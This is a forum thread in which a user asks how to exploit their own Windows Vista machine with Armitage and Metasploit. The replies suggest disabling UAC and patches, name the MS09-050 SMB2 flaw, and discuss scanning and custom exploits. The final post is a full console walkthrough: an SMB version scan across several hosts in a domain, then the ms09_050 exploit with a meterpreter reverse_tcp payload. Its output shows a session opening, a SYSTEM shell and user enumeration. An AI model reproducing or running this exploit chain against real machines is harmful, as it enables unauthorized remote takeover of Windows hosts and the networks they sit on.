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Im using armitage and metasploit.

Im trying to attack windows vista machine at my home. the target machine is mine.

Only machine that I have been able to attack and gain access is windows 2000.

So what exploits should I use. Please help me, Im just trying to learn to use metasploit.


I need to dust up on my metasploit skills too, there was a Hak5 episode that had a Metasploit tutorial that Mubix did but I forget which episode it was..

I just got another pc tower I would like to start practicing on for fun, I also got a book on metasploit but I am too lazy to read the 400 pages right now lol


Iv seen that episede, in it they use some kind of website attack or something like that. In that it requires that user at target pc goes to that site. Its not what I need.


What kind of errors do you receive in Metasploit framework, when you try to exploit Vista?

Plus you will need to make sure UAC is not running, I found out that it can block metasploits attacks.


What kind of errors do you receive in Metasploit framework, when you try to exploit Vista?

Plus you will need to make sure UAC is not running, I found out that it can block metasploits attacks.

Arimitage didnt give any errors.

I scanned target. imported it to armitage and tried to attack vista machine (the target).

I tried every exploit that armitage recommended.

UAC was on when I tried to attack that machine


Arimitage didnt give any errors.

I scanned target. imported it to armitage and tried to attack vista machine (the target).

I tried every exploit that armitage recommended.

UAC was on when I tried to attack that machine

Have you tried turning off the UAC? I've read in other forums that, with the UAC turned on most of the exploitation won't work very well.


Have you tried turning off the UAC? I've read in other forums that, with the UAC turned on most of the exploitation won't work very well.

Not yet, Ill have to give it a try

  • 2 months later...


Im using armitage and metasploit.

Im trying to attack windows vista machine at my home. the target machine is mine.

Only machine that I have been able to attack and gain access is windows 2000.

So what exploits should I use. Please help me, Im just trying to learn to use metasploit.

What is the machine vulnerable to? What patches have been applied? Are your looking to do a completely remote attack against an unused fresh build of Vista? You can try 09_050. Might work.


What is the machine vulnerable to? What patches have been applied? Are your looking to do a completely remote attack against an unused fresh build of Vista? You can try 09_050. Might work.

It can be quite hard sometimes to exploit a XP or Vista machine. It all depends on how well the target machine is patched up. There are ways to make it vulnerable.

Like uninstalling the patches, making sure there are no security essentials enabled (eg Firewall, Antivirus)

And a few other things, that I can't remember from the top of my head. But these are very basic steps you can take to make a host vulnerable.


Thanks for replies. I prefer not to use browser attacks, not attack involving user opening a file or going to a website.


A lot of times its also not even required to be patched to be protected. I have a VM that is vulnerable to the MS08-068 flaw. Its a XP Pro SP3 machine, but if I turn off the "Server", "Workstation" and "Computer Browser" services, the attack doesn't work since it exploits SMB with remote code execution. If a machien is vulnerable to attack, but the default services required to exploit it are turned off, you aren't going to get in using the built in exploits to metasploit. You will need something custom or browser based that can attack 3rd party apps.

Most attacks these days are browser based anyway since they can be deployed to any number of sites you can lure the victim to and the corporate networks usually allow people to browse the internet. With that said, its not entirely impossible to do client side attacks, but you have to know what to attack on the system that could be flawed, even when there are no services showing with a port scan. If you have patched this machine with all the latest updates, about the only ways to get in would be 3rd party apps such as Flash or Acrobat, Quicktime, older browsers such as FireFox, IE6, etc, or finding a 0-day flaw.

You can try several different methods of scanning though. While Armitage will try nmap and metasploit scanning, you can also try other scanners such as Nessus(since its your own network, apply for a home key and run it on your own personal boxes) to see what it can tell you as well. To exploit it, you may need a custom written exploit once you know all the target information, and this is where combining it with metasploit would help you, but not every exploit or flaw is going to be in metasploit by default. Part of being a pentester is having to write your own exploit code and custom shellcode, which is why you need a better understanding of the complete picture from how buffer overflows work to, bypassing DEP and ASLR, egg hunting, etc. Stuff that is just way over my head, but I know enough to keep myself out of trouble.

  • 1 month later...


[o] Exploiting Vista SP1 with SMB2 [metasploit]

[o] Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference

root@evilc0de:~# msfconsole



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||--|| *

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]

+ -- --=[ 590 exploits - 302 auxiliary

+ -- --=[ 224 payloads - 27 encoders - 8 nops

=[ svn r10414 updated today (2010.09.21)

msf > use scanner/smb/smb_version

msf auxiliary(smb_version) > show options

Module options:

Name Current Setting Required Description

---- --------------- -------- -----------

RHOSTS yes The target address range or CIDR identifier

SMBDomain WORKGROUP no The Windows domain to use for authentication

SMBPass no The password for the specified username

SMBUser no The username to authenticate as

THREADS 1 yes The number of concurrent threads

msf auxiliary(smb_version) > set RHOSTS


msf auxiliary(smb_version) > set THREADS 50


msf auxiliary(smb_version) > show options

Module options:

Name Current Setting Required Description

---- --------------- -------- -----------

RHOSTS yes The target address range or CIDR identifier

SMBDomain WORKGROUP no The Windows domain to use for authentication

SMBPass no The password for the specified username

SMBUser no The username to authenticate as

THREADS 50 yes The number of concurrent threads

msf auxiliary(smb_version) > run

[*] is running Windows 7 Professional (Build 7600) (language: Unknown) (name:ONAN-ULTIMECIA) (domain:ONAN-ULTIMECIA)

[*] is running Windows Vista Ultimate Service Pack 1 (language: Unknown) (name:PUPEN-SNOWBLACK) (domain:KAPUKVALLEY)

[*] is running Windows XP Service Pack 2+ (language: English) (name:ALLSTAR-TAPO) (domain:KAPUKVALLEY)

[*] is running Windows 7 Ultimate (Build 7600) (language: Unknown) (name:PINKY-BENZ) (domain:KAPUKVALLEY)

msf auxiliary(smb_version) > use windows/smb/ms09_050_smb2_negotiate_func_index

msf exploit(ms09_050_smb2_negotiate_func_index) > info

Name: Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference

Version: 9669

Platform: Windows

Privileged: Yes

License: Metasploit Framework License (BSD)

Rank: Good

Provided by:




Available targets:

Id Name

-- ----

0 Windows Vista SP1/SP2 and Server 2008 (x86)

Basic options:

Name Current Setting Required Description

---- --------------- -------- -----------

RHOST yes The target address

RPORT 445 yes The target port

WAIT 180 yes The number of seconds to wait for the attack to complete.

Payload information:

Space: 1024


This module exploits an out of bounds function table dereference in

the SMB request validation code of the SRV2.SYS driver included with

Windows Vista, Windows 7 release candidates (not RTM), and Windows

2008 Server prior to R2. Windows Vista without SP1 does not seem

affected by this flaw.








msf exploit(ms09_050_smb2_negotiate_func_index) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(ms09_050_smb2_negotiate_func_index) > set RHOST


msf exploit(ms09_050_smb2_negotiate_func_index) > set LHOST


msf exploit(ms09_050_smb2_negotiate_func_index) > show options

Module options:

Name Current Setting Required Description

---- --------------- -------- -----------

RHOST yes The target address

RPORT 445 yes The target port

WAIT 180 yes The number of seconds to wait for the attack to complete.

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC thread yes Exit technique: seh, thread, process

LHOST yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Windows Vista SP1/SP2 and Server 2008 (x86)

msf exploit(ms09_050_smb2_negotiate_func_index) > exploit

[*] Started reverse handler on

[*] Connecting to the target (

[*] Sending the exploit packet (872 bytes)...

[*] Waiting up to 180 seconds for exploit to trigger...

[*] Sending stage (748544 bytes) to

[*] Meterpreter session 1 opened ( -> at 2010-09-21 23:31:10 +0700

meterpreter > sysinfo


OS : Windows Vista (Build 6001, Service Pack 1).

Arch : x86

Language: en_US

meterpreter > shell

Process 1240 created.

Channel 1 created.

Microsoft Windows [Version 6.0.6001]

Copyright © 2006 Microsoft Corporation. All rights reserved.

C:\Windows\system32>net user

net user

User accounts for \\

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